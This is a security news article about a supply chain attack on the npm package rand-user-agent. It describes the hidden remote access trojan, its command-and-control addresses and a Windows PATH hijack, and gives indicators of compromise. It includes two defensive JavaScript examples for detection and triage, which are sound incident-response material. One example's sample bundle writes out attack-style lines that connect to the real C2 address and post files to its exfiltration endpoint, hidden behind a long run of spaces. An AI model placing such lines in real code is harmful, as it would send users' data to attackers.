Monday, May 19, 2025

New Supply Chain Attack Compromises Popular npm Package with 45,000 Weekly Downloads


A supply chain attack has compromised the widely used npm package rand-user-agent, which receives about 45,000 downloads a week, in a worrying development for the JavaScript developer community.

Maintained by WebScrapingAPI, the package generates randomized, real-world user-agent strings, weighted by how often each string is seen in the wild.

However, recent analysis has uncovered malicious code embedded in several of its latest releases, turning a trusted utility into a covert Remote Access Trojan (RAT) that can take control of the host and exfiltrate sensitive data.

Figure: Hidden code via scroll bar in rand-user-agent

Malicious Code Injected

The attack came to light when security researchers spotted suspicious code in the dist/index.js file of versions 2.0.83, 2.0.84 and 1.0.110 of the package.

The last publicly documented update to the GitHub repository corresponds to version 2.0.82, published seven months earlier; the later releases on npm contained hidden, obfuscated scripts that do not appear anywhere in the source repository.

This discrepancy strongly suggests that the malicious versions were published straight to the npm registry rather than being built from the project's repository, so reviewing the GitHub history alone would not have revealed them.

The malicious code, pushed far to the right of the line so that it sat out of view behind a horizontal scroll bar and further wrapped in layers of obfuscation, contains a payload that establishes covert communication channels with command-and-control (C2) servers.

It connects to a socket endpoint at http://85.239.62.36:3306 using socket.io-client to receive commands in real time, and uploads files to http://85.239.62.36:27017/u/f via HTTP POST requests made with axios. Note that 3306 and 27017 are the default MySQL and MongoDB ports, so in coarse network logs this traffic can pass for database connections; the giveaway is the public destination address.

Both dependencies are installed on the fly if they are missing, into a .node_modules folder in the user's home directory rather than the project's node_modules, where a dependency audit of the project would not notice them.

RAT Payload Enables Remote Control

Upon execution, the RAT identifies the compromised system to the C2 server by sending a client ID built from the hostname and username, the OS type, and the process ID.

According to the report, it supports a range of commands that let attackers change directories, execute arbitrary shell commands, and upload individual files or entire directories to the exfiltration endpoint.

A particularly insidious feature targets Windows systems by prepending a crafted path, %LOCALAPPDATA%\Programs\Python\Python3127, to the PATH environment variable.

The directory name mimics the default per-user Python install location (%LOCALAPPDATA%\Programs\Python\Python3xx), and because it is placed at the front of PATH, any python.exe or pip.exe dropped there is resolved before the real interpreter. Developers and build scripts that call Python by name would run the attacker's binary without noticing.
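The mechanism behind the PATH hijack, as an added example that is not code from the article or from rand-user-agent: a Windows-style command lookup that walks PATH left to right, showing why the prepended directory wins, plus two checks a responder can run. The user profile, install directories and executable layout are constructed for the demo.

```javascript
// Added example (not from the article or from rand-user-agent): a Windows-style
// command lookup showing why a directory prepended to PATH lets an attacker's
// python.exe shadow the real interpreter, plus two checks for the condition.
// The user profile, install directories and file layout are constructed here.

const PATHEXT = ['.exe', '.cmd', '.bat']; // subset of the Windows default PATHEXT

// Resolve `cmd` the way CreateProcess/cmd.exe search PATH: directories left to
// right, each PATHEXT extension in turn; the first existing file wins.
function resolveCommand(cmd, pathValue, files) {
  for (const dir of pathValue.split(';').filter(Boolean)) {
    for (const ext of PATHEXT) {
      const candidate = `${dir}\\${cmd}${ext}`;
      if (files.has(candidate.toLowerCase())) return candidate;
    }
  }
  return null;
}

// Which PATH entries searched before `expectedDir` would resolve `cmd` first?
// Anything returned here shadows the interpreter you think you are running.
function shadowingEntries(cmd, pathValue, files, expectedDir) {
  const shadows = [];
  for (const dir of pathValue.split(';').filter(Boolean)) {
    if (dir.toLowerCase() === expectedDir.toLowerCase()) break;
    if (resolveCommand(cmd, dir, files)) shadows.push(dir);
  }
  return shadows;
}

// Exact match against the PATH entry named in the report, with the
// environment variable expanded the way the payload would see it.
const IOC_PATH_ENTRY = '%LOCALAPPDATA%\\Programs\\Python\\Python3127';
function hasIocPathEntry(pathValue, localAppData) {
  const bad = IOC_PATH_ENTRY.replace(/%LOCALAPPDATA%/i, localAppData).toLowerCase();
  return pathValue.split(';').some(e => e.trim().toLowerCase() === bad);
}

// --- constructed demo environment ------------------------------------------
const LOCALAPPDATA = 'C:\\Users\\dev\\AppData\\Local';
const REAL_PYTHON = `${LOCALAPPDATA}\\Programs\\Python\\Python312`; // normal per-user install
const HIJACK_DIR = `${LOCALAPPDATA}\\Programs\\Python\\Python3127`; // entry from the report

// Lower-cased full paths of executables present on the (pretend) disk.
const FILES = new Set([
  'C:\\Windows\\System32\\cmd.exe',
  `${REAL_PYTHON}\\python.exe`,
  `${HIJACK_DIR}\\python.exe`, // attacker-dropped binary
].map(p => p.toLowerCase()));

const CLEAN_PATH = `C:\\Windows\\System32;${REAL_PYTHON}`;
const HIJACKED_PATH = `${HIJACK_DIR};${CLEAN_PATH}`; // what the RAT produces

function demo() {
  return {
    cleanResolves: resolveCommand('python', CLEAN_PATH, FILES),
    hijackedResolves: resolveCommand('python', HIJACKED_PATH, FILES),
    shadows: shadowingEntries('python', HIJACKED_PATH, FILES, REAL_PYTHON),
    iocPresent: hasIocPathEntry(HIJACKED_PATH, LOCALAPPDATA),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

On a real Windows host, pass `process.env.PATH` and `process.env.LOCALAPPDATA` to `hasIocPathEntry`, and build the file set from the directories in PATH with `fs.readdirSync` before calling `shadowingEntries`. The second check is the more general one: it catches any entry ahead of the expected Python directory that contains a python.exe, whether or not it uses the exact name from the report.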

Together, these capabilities give attackers deep access to infected systems, with a severe risk of data theft and unauthorized control of developer workstations and build machines.

Developers who installed the affected versions should immediately audit their systems for indicators of compromise, including unexpected network traffic to the C2 endpoints listed below.

Remediation steps include uninstalling the compromised versions (or pinning to 2.0.82, the last release that matches the repository), deleting the .node_modules folder the payload created in the home directory, checking lockfiles for the affected versions, and reviewing the PATH variable for the injected entry. Because the RAT can run arbitrary commands and upload files, any credentials or tokens reachable from an affected host should be treated as exposed and rotated.

This incident underscores the persistent threat of supply chain attacks in open-source ecosystems, where trust in widely used packages can be weaponized with devastating effect.

The broader lesson is that an npm release cannot be assumed to match the repository it claims to come from: releases that appear on the registry without a corresponding commit or tag deserve scrutiny, and verification mechanisms that tie a published version to the source it was built from would make this kind of breach far harder to hide.

Indicators of Compromise (IoC)

Indicator Type            Value                                              Description
Malicious Versions        2.0.83, 2.0.84, 1.0.110                            Affected package versions
Socket Connection         http://85.239.62.36:3306                           C2 server for command control
File Upload Target        http://85.239.62.36:27017/u/f                      Endpoint for data exfiltration
Hijacked PATH Entry       %LOCALAPPDATA%\Programs\Python\Python3127          Directory prepended to PATH on Windows
Hidden Dependency Folder  ~/.node_modules (socket.io-client, axios)          Where the payload installs its own dependencies
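An offline triage script built from the indicators above, as an added example that is not code from the article or from the project. It flags the malicious versions in a package-lock.json (both the flat v2/v3 "packages" map and the nested v1 "dependencies" tree), greps a shipped bundle for the C2 endpoints and for code hidden off-screen behind a long run of whitespace, and lists what the payload dropped into ~/.node_modules. The lockfile, bundle text, home-directory listing and the dependency name "example-scraper" are constructed for the demo.

```javascript
// Added example (not from the article or from rand-user-agent): offline triage
// of a Node.js project against the indicators above. The lockfile, bundle and
// home-directory listing are constructed stand-ins; on a real host read them
// with fs.readFileSync / fs.readdirSync and feed the same functions.

const MALICIOUS_VERSIONS = new Set(['2.0.83', '2.0.84', '1.0.110']);
const C2_ENDPOINTS = ['http://85.239.62.36:3306', 'http://85.239.62.36:27017/u/f'];
const C2_HOST = '85.239.62.36';

// Return every installed copy of `name` recorded in a package-lock.json:
// lockfileVersion 2/3 keep a flat "packages" map keyed by path, v1 keeps a
// nested "dependencies" tree (v2 has both, so prefer the map when present).
function findPackageVersions(lock, name = 'rand-user-agent') {
  const hits = [];
  if (lock.packages) {
    for (const [key, meta] of Object.entries(lock.packages)) {
      if (key === `node_modules/${name}` || key.endsWith(`/node_modules/${name}`)) {
        hits.push({ path: key, version: meta.version });
      }
    }
    return hits;
  }
  const walk = (deps, prefix) => {
    for (const [dep, meta] of Object.entries(deps || {})) {
      const p = `${prefix}node_modules/${dep}`;
      if (dep === name) hits.push({ path: p, version: meta.version });
      walk(meta.dependencies, `${p}/`);
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

function flagMaliciousVersions(lock) {
  return findPackageVersions(lock).filter(h => MALICIOUS_VERSIONS.has(h.version));
}

// Grep the shipped bundle for the C2 endpoints. The injected code was pushed
// far to the right of the line so it hid behind the editor's horizontal
// scroll bar, so a long run of whitespace followed by code is flagged too
// (heuristic: minified bundles rarely contain 200+ consecutive spaces).
function scanBundle(source) {
  const findings = [];
  source.split('\n').forEach((line, i) => {
    const hit = C2_ENDPOINTS.filter(e => line.includes(e));
    if (hit.length) findings.push({ line: i + 1, kind: 'c2-endpoint', detail: hit });
    else if (line.includes(C2_HOST)) findings.push({ line: i + 1, kind: 'c2-host', detail: [C2_HOST] });
    if (/\s{200,}\S/.test(line)) findings.push({ line: i + 1, kind: 'hidden-offscreen', detail: [] });
  });
  return findings;
}

// The payload installs socket.io-client and axios into ~/.node_modules, not the
// project's node_modules; list what lives there (real host: fs.readdirSync of
// path.join(os.homedir(), '.node_modules')).
function findHiddenModules(homeEntries) {
  return homeEntries.filter(e => e.startsWith('.node_modules/'));
}

function triage(lock, bundleSource, homeEntries) {
  return {
    maliciousVersions: flagMaliciousVersions(lock),
    bundleFindings: scanBundle(bundleSource),
    hiddenModules: findHiddenModules(homeEntries),
  };
}

// --- constructed sample inputs ---------------------------------------------
// "example-scraper" is a made-up dependency that pulls in the 1.x line.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { 'rand-user-agent': '^2.0.82', 'example-scraper': '1.0.0' } },
    'node_modules/rand-user-agent': { version: '2.0.84' },
    'node_modules/example-scraper': { version: '1.0.0', dependencies: { 'rand-user-agent': '1.x' } },
    'node_modules/example-scraper/node_modules/rand-user-agent': { version: '1.0.110' },
  },
};

const SAMPLE_BUNDLE = [
  'module.exports = function randomUserAgent() { /* legitimate code */ };',
  ' '.repeat(300) + "require('socket.io-client')('http://85.239.62.36:3306');",
  "axios.post('http://85.239.62.36:27017/u/f', form);",
].join('\n');

const SAMPLE_HOME = ['.bashrc', '.node_modules/socket.io-client', '.node_modules/axios', 'projects'];

console.log(JSON.stringify(triage(SAMPLE_LOCK, SAMPLE_BUNDLE, SAMPLE_HOME), null, 2));
```

Two caveats when running this for real: a nested copy of the package (as the sample's second hit shows) is easy to miss if you only check the top-level dependency, and an obfuscated payload may assemble the endpoint string at runtime, so the bundle grep is a first pass, not a clean bill of health; the network-side check for connections to 85.239.62.36 should be run alongside it.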


Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware and vulnerabilities.
